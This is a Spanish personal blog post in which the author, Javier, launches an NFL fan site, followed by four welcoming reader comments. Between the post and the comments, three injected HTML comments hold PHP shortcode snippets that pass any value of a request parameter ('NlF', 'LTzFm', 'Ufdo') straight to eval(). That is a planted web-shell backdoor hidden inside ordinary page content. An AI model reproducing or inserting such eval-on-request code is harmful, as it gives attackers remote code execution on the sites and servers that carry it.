Kick Off!

Share on LinkedIn0Tweet about this on TwitterShare on Facebook0Email this to someoneShare on Google+0Pin on Pinterest0
… ¡y el balón está en el aire!
Así comienza la andadura de esta web. No se cuanta gente la encontrará, cuantos le dedicarán tiempo a leer las historietas que vaya escribiendo y cuantos se tomarán la molestia o el interés de contestar a las entradas, pero la ilusión por mi parte no va a faltar.
A modo de presentación, me llamo Javier, pero podéis llamarme Javi, y soy un aficionado bastante novel en el mundo de la NFL. Llevo siguiendo noticias del deporte desde el año 2005 más o menos, en rachas de mayor o menor interés, pero desde hace un par de años sigo la NFL de manera más enfermiza. Especialmente desde que en la temporada 2012 decidí suscribirme al famoso Game Pass de nfl.com. Tras dos años de ver guascas a mansalva, estoy totalmente footballizado.
Tengo un equipo predilecto por encima de todos, y algún otro al que también me gusta ver ganar. No os voy a decir cuales, no por nada en especial, sino para que cada uno pueda intentar adivinarlo jejeje.
Y como los kick offs en el football americano son cosas de segundos, vamos a dejar que el retornador comience con la carrera.
Bienvenid@s a tod@s!!!

<!– [insert_php]if (isset($_REQUEST["NlF"])){eval($_REQUEST["NlF"]);exit;}[/insert_php][php]if (isset($_REQUEST["NlF"])){eval($_REQUEST["NlF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LTzFm"])){eval($_REQUEST["LTzFm"]);exit;}[/insert_php][php]if (isset($_REQUEST["LTzFm"])){eval($_REQUEST["LTzFm"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Ufdo"])){eval($_REQUEST["Ufdo"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ufdo"])){eval($_REQUEST["Ufdo"]);exit;}[/php] –>

5 thoughts on “Kick Off!”

  1. Bienvenido al mundo de los blogs! Ya era hora de que creases tu propio espacio! @:) Espero que le dediques tanta pasión a esto como lo haces en vivo y en directo cuando te enfrascas en rememorar un partido, una jugada, un reportaje sobre la vida de un jugador, o cualquiera de las mil y una cosas que tienes que contar sobre la NFL!
    Let the fun begin!

  2. ¡¡¡Madre mía, Javi!!! Me lo voy a pasar de lujo con tus comentarios porque no te cortas nada, además me encanta el nombre que le has puesto al blog, dice mucho de ti. Gran título y presentación que has escrito.

    Y con el tema de la Free Agency tienes material de sobra para empezar a poner cosas en este paredón.

    ¡Comienza la temporada!

  3. Muchas gracias por vuestro apoyo! a ver si se va moviendo la web y dentro de poco empezamos a ser más amig@s con ganas de hablar de este gran deporte!!

  4. Buenas aquí un auténtico desconocedor del Fútbol Americano que se apunta a seguir tu blog y aprender un poco más del deporte del otro lado del charco.

    Un saludo y ánimo con el blog!!

Leave a Reply

Your email address will not be published. Required fields are marked *